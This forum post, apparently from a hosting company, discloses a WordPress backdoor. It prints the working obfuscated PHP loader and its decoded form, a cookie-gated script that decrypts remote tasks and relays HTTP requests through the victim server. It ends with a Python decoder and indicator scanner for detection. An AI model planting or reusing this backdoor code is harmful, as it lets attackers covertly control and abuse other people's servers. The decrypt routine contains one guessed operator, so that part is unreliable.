Author Topic: WordPress Backdoor PHP code  (Read 9561 times)

Scott Anderson
WordPress Backdoor PHP code
« on: April 27, 2016, 04:08:19 PM »
We have detected a backdoor PHP code in many of our clients' websites. It is often hidden in the WP writable directory. This backdoor is used to send PHP code for execution.

Code:
<?php
$yeqqdvu = 6110;
function neceliemyz($rdcldpm, $oqwvlr)
{
    // map each character of $rdcldpm through the lookup table $oqwvlr,
    // leaving unmapped characters unchanged, then base64-decode the result
    $efogjgyh = '';
    for ($i = 0; $i < strlen($rdcldpm); $i++) {
        $efogjgyh .= isset($oqwvlr[$rdcldpm[$i]]) ? $oqwvlr[$rdcldpm[$i]] : $rdcldpm[$i];
    }
    $pgdnvjl = "base64_decode";
    return $pgdnvjl($efogjgyh);
}
$hljnyoyp = 'KevoH68qlUKamupXVJy4IUvPlUmxdJmqmxttM04Zg9yXdcvPVu63MgG4duGPlUmxdJmqm'.
'xttM04Zg9yvVsmSVv8xlUySVspXdcVarg97RKXNVu63UJpXdk6Pdev2HUKa'.
'rg97RKXNHkGodJmvUJ6qlUmPIkmSVsKarO97RKXNHkWXUJZvGgAsdkwYUu6YlkZFGevSdv83HkFvmxttM04ZgA3Mlc8'.
'xlkwhHgNamw8R038BOjjAIUrAmev3lk3XRKX7RKaADgNAHkIAMgpXGe62DgQ8DgDtI0wcrqIxrx3uIqDqB0p5ler2IhvbzO3'.
'xZkjtlRrWrcl5l0V5MK3MDgNADgNADgyvLev3Mg97RKX8RKaZg5p9IUpbDR3Alcv4l68slUpPIu8oGe6oGiramJya'.
'VRaSBuvoVi63mx97RKa9lew3ION8DiZtdev3MgD8D5t9lew3IOtxM04ZgA3MmeDuZw89lkZSle6Plew3'.
'ION8DembVujuZw89lkZSlejaGUm4le6hdupvMgp9IUpbkqwGMO97RKaZg5pqlkW9UupbGeQAfOyFdsZvVcvbdevTlOb9lkZxL'.
'Uy3Mgp5ZhpPle6hdupvUupbGeQXM04ZgA3MmimvVJ64GgN8DiZvdcpPle'.
'w3I0QAMgpqlkW9UupbGeQXzt3MRKXXl5NaDOpxlUZFdiKXRKX7RKaADgNAmimvVJ64GgN8DiZvdcpPlew3I0DamiZvd'.
'cpPlew3IO97RKX8RKaZgc6hHeCAmimvVJ64GR4ZgA3Mls6oIJpXduYAle6hVsvtGgA9lew3IO9Z'.
'gs4Zg5NADgN9dJ63UupbGeQAfON5Dh4Zg5NADgN9Hu6WDR3Amw80p6mkp6'.
'mdm3bj6wyPOQ806gGGDgYAmw80p6mkp6mdmFmwj66wjFpP66mmmF37RKaADgN'.
'Ame2vL684lkYAfOyqGim4lkYame2vLO97RKaARKaADgNAlc8xDgA9H03tzxN9H'.
'ONCDiZ3Vcnvd5A9Hu6WM04Ame91Mx9Zg5NADgy7RKaADgNADgNADgp1lUvdmevGDR3AIubxMe8xlgA9'.
'Hu6WkxpXUO9AU5Name2vL684lkYAmONxZ0jXM04Zg5NADgy8RKaZg5NADgycdJDAMgpXf0N7Dg'.
'pXfiZ3Vcnvd5A9lew3IO97MK3MDgNADi4Zg5NADgNADgNAlc8xDgA9Hh3tzxN9HhnqGim4lkYame2vLO9Am5IAme9CVJpxde6'.
'oMgp9IUpbM04Amea1MxtAme91Mx9Zg5NADgNADgNALt3MDgNADgNADgNADgNAme8FGw89I'.
'UpbDgY8DeZaV5bSVcKamepbGewdmevGMOyLDe8xlgA9Hu6WkxpEUO9Xzt3MDgNADgNADgy8RKaADgNAPK3MRKaADg'.
'NAVc63GUmoDgpSGUpPlew3I04Zgs3ZgA3Mls6oIJpXduYAVu6olw89IUpbrOA9lew3IO9Zgs4Zg5NADgN9He6blgN8DgD5z'.
't3MRKaADgNAlc8xlkwhHgA9lew3I645He6ble6xVxmGDewqDgp1lU98f5puIknFlO9Zg5NADgy7RKaADgNADgNADgpa'.
'lkw9DgY8Dgp1lU9AB5N5z5N5DgYAmilbdi6vDgYADvnxUeY5zt3MDgNADi3ZgA3MDgNAD'.
'gptIUmbdUrAfOybVsmbLOAsHip3VgVAf0YAIUmxIU9aRKaADgNADgNADgG2lUpaduKsDR3+Dgp9IUpb'.
'kxm2lUpaduK5UOtZg5NADgNADgNAmubvIkpvV5VAf0YAmebvIkK4RKaADgNADgNADgGh'.
'duW3lkW3mxN8f5N9lew3I645Ic89LOmGBN3MDgNADgNADgNsGev2lk8FGgVAf0YAmepbGewdDspXdk6SG'.
'UK5UOtZg5NADgNADgNARKaADgNAMO97RKaZg5NADgN9IJpYDR3AVJpxlkw2UuZSdspvLipPIJmvIUp'.
'vMgptIUmbdUrXzt3MDgNADN3MDgNADgpxlUZFdiKAfOyNlcv4l68slUpPIu8oGe'.
'6oGiramepbGewdDs6xdgmGBgyeKjn0pOtAmeZ3Lg97RKaZg5NADgyXl5Nameb3Giy'.
'PVc6qVe8oVu6PHe6ble6xMK3MDgNADi4Zg5NADgNADgNAHkIAMiZ3VsySVxA9'.
'Hip3Vw8xlUZtduWql68alkw9lUmdrw34DgDxrRN5MON8f03Ap9wrj3jXRKaADgNADgNADi4Zg5NADgNADgNADgNADgpxlU'.
'ZFdiKAfON5Owpjjw8wjvmfjvn3D5NoDgpaGiptUJmvVJySdsZvUubvIkpvVv4tU04Zg5'.
'NADgNADgNAPK3MDgNADi3Zg5NADgyvdiZvRKaADgNALt3MDgNADgNADgN9Vc6qGkn3DR3AD9Zf09WwKFpm03WPp6mO0'.
'FD5zt3MDgNADi3ZgA3MDgNADimvGi6xd5N9Vc6qGkn3zt3MPK3MRKXcGkWhGevSd5yqlkW9UupbGeQxMgp9IUpb'.
'MK3MLt3MDgNADgCSDi6qlOyqduZ1lUpqRKX8';
// single-character substitution table applied to the blob before base64 decoding
$budjtact = Array('1'=>'r', '0'=>'T', '3'=>'0', '2'=>'t', '5'=>'i', '4'=>'s', '7'=>'7', '6'=>'V', '9'=>'k', '8'=>'9', 'A'=>'g', 'C'=>'8', 'B'=>'L', 'E'=>'q', 'D'=>'I', 'G'=>'d', 'F'=>'1', 'I'=>'Y', 'H'=>'a', 'K'=>'Q', 'J'=>'3', 'M'=>'K', 'L'=>'e', 'O'=>'S', 'N'=>'A', 'Q'=>'E', 'P'=>'f', 'S'=>'v', 'R'=>'D', 'U'=>'X', 'T'=>'6', 'W'=>'5', 'V'=>'c', 'Y'=>'4', 'X'=>'p', 'Z'=>'N', 'a'=>'o', 'c'=>'m', 'b'=>'h', 'e'=>'G', 'd'=>'b', 'g'=>'C', 'f'=>'P', 'i'=>'H', 'h'=>'j', 'k'=>'W', 'j'=>'U', 'm'=>'J', 'l'=>'Z', 'o'=>'u', 'n'=>'x', 'q'=>'z', 'p'=>'R', 's'=>'n', 'r'=>'M', 'u'=>'2', 't'=>'w', 'w'=>'F', 'v'=>'l', 'y'=>'B', 'x'=>'y', 'z'=>'O');
// the comment between eval and its parenthesis is a signature-evasion trick
eval/*oynngj*/(neceliemyz($hljnyoyp, $budjtact));

?>

We have decoded the code into its plain PHP version:

Code:
<?php

// silence all errors and keep the script alive for long-running requests
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time', 0);

// access gate: every cookie value must equal the fixed token, otherwise exit
foreach ($_COOKIE as $item)
{
    if ($item != "0a1f3623-6c23-4bdc-b9a9-25e0d392fbe7")
        exit();
}

// read the raw POST body and keep everything after the first '='
$data = file_get_contents('php://input');
$data = split('=', $data, 2);

$b64_decode_data = base64_decode(urldecode($data[1]));

// decrypt with a key derived from the request, then unserialize the task
$send_data = unserialize(decrypt($b64_decode_data));

$result = send_data1($send_data);

if (!$result)
{
    $result = send_data2($send_data);
}

echo $result;

function decrypt($data)
{
    $out_data = "";
    // key is the host name plus request URI, each byte XORed with the key length
    $key = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    $key_len = strlen($key);

    for ($i = 0; $i < strlen($key); $i++)
    {
        // the operator between $key_len and 255 was lost in extraction; % assumed
        $key[$i] = chr(ord($key[$i]) ^ ($key_len % 255));
    }

    // repeating-key XOR of the payload with the transformed key
    for ($i = 0; $i < strlen($data);)
    {
        for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++)
        {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }

    return $out_data;
}

function send_data1($data)
{
    // build an outgoing HTTP request from the task received in the POST body
    $head = "";

    foreach ($data["headers"] as $key => $value)
    {
        $head .= $key . ": " . $value . "\r\n";
    }

    $params = array('http' => array(
        'method'  => $data["method"],
        'header'  => $head,
        'content' => $data["body"],
        'timeout' => $data["timeout"],
    ));

    $ctx = stream_context_create($params);

    $result = @file_get_contents($data["url"], FALSE, $ctx);

    if ($http_response_header)
    {
        if (strpos($http_response_header[0], "200") === FALSE)
        {
            $result = "HTTP_ERROR\t" . $http_response_header[0];
        }
    }
    else
    {
        $result = "CONNECTION_ERROR";
    }

    return $result;
}

function send_data2($data)
{
    // use sockets
}

It's always recommended to use themes and plugins from good vendors to avoid these issues.

Thanks,
Scott
Hostripples - Affordable web hosting
https://hostripples.com
https://hostripples.in
https://hostripples.co.uk
Hostripples.com $1 Unlimited Hosting
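As an added example for readers who need to triage a sample like the one in the post (this is not code from the post or from Hostripples), the Python helper below reproduces the loader's decode step, mapping each character through a substitution table and then base64-decoding, so the payload can be read as text instead of being executed, and runs a small set of indicators taken from the loader's shape (a comment wedged between eval and its parenthesis, a function name held in a string, a large single-character lookup table, a cookie token gate, a raw php://input read) over PHP source text. The substitution table, the encoded blob and the two PHP snippets it scans are constructed for the demonstration and are not the real sample; the indicator names are my own.

```python
"""Decode helper and indicator scan for the substitution + base64 + eval loader pattern."""
import base64
import re


# --- Decode step -------------------------------------------------------
# The loader maps each character of a blob through a lookup table (characters
# without an entry pass through unchanged), base64-decodes the result and hands
# it to eval().  Reproducing the first two steps yields the payload as text.

def substitute(text, table):
    """Map every character through `table`; characters without an entry pass through."""
    return "".join(table.get(ch, ch) for ch in text)


def decode_payload(blob, table):
    """Substitution followed by base64 decoding: the text the loader would eval()."""
    return base64.b64decode(substitute(blob, table)).decode("utf-8", "replace")


def encode_payload(plain, table):
    """Inverse of decode_payload; used here only to build a constructed sample."""
    inverse = {v: k for k, v in table.items()}
    return substitute(base64.b64encode(plain.encode()).decode(), inverse)


# Constructed table (not the one in the sample): every entry swaps with its
# partner, so keys and values coincide and the table is its own inverse.
SAMPLE_TABLE = {"Z": "Q", "Q": "Z", "b": "x", "x": "b",
                "l": "k", "k": "l", "O": "J", "J": "O"}

# Constructed, harmless payload encoded the way the loader expects.
SAMPLE_BLOB = encode_payload('echo "hello";', SAMPLE_TABLE)


# --- Indicators --------------------------------------------------------
# Each indicator is a (name, predicate) pair over one PHP source text.
_PAIR_RE = re.compile(r"""['"][0-9A-Za-z]['"]\s*=>\s*['"][0-9A-Za-z]['"]""")

INDICATORS = [
    # comment wedged between eval and its opening parenthesis
    ("eval_with_inline_comment",
     lambda s: re.search(r"eval\s*/\*.*?\*/\s*\(", s, re.S) is not None),
    # function name held in a string and called through a variable
    ("string_named_base64_decode",
     lambda s: re.search(r"""=\s*['"]base64_decode['"]""", s) is not None),
    # large single-character substitution table
    ("char_substitution_table",
     lambda s: len(_PAIR_RE.findall(s)) >= 8),
    # cookie value compared to a fixed token, with exit() on mismatch
    ("cookie_token_gate",
     lambda s: re.search(r"\$_COOKIE.*?exit\s*\(", s, re.S) is not None),
    # raw request body read, typical of task-receiving backdoors
    ("reads_php_input",
     lambda s: re.search(r"""file_get_contents\s*\(\s*['"]php://input""", s) is not None),
]


def scan_source(source):
    """Return the names of the indicators that fire on one PHP source text."""
    return [name for name, hit in INDICATORS if hit(source)]


# Constructed PHP snippets for the scan (not the real sample).
SUSPECT_SOURCE = r"""<?php
$fn = "base64_decode";
$map = Array('1'=>'r', '0'=>'T', '3'=>'0', '2'=>'t', '5'=>'i', '4'=>'s', '7'=>'7', '6'=>'V', '9'=>'k');
foreach ($_COOKIE as $c) { if ($c != "token") exit(); }
$body = file_get_contents('php://input');
eval/*junk*/($fn(strtr($body, $map)));
"""

CLEAN_SOURCE = r"""<?php
echo json_encode(array('status' => 'ok'));
"""

if __name__ == "__main__":
    print("suspect:", scan_source(SUSPECT_SOURCE))
    print("clean:  ", scan_source(CLEAN_SOURCE))
    print("decoded:", decode_payload(SAMPLE_BLOB, SAMPLE_TABLE))
```

To use this on a real find, paste the sample's own table into `SAMPLE_TABLE` and its concatenated string into `SAMPLE_BLOB`, and call `decode_payload` to read the payload; `scan_source` is meant to be run over each `.php` file under the writable upload directory, and any file where several indicators fire together deserves a manual look. The indicators are deliberately structural rather than tied to the random variable names, which change from sample to sample.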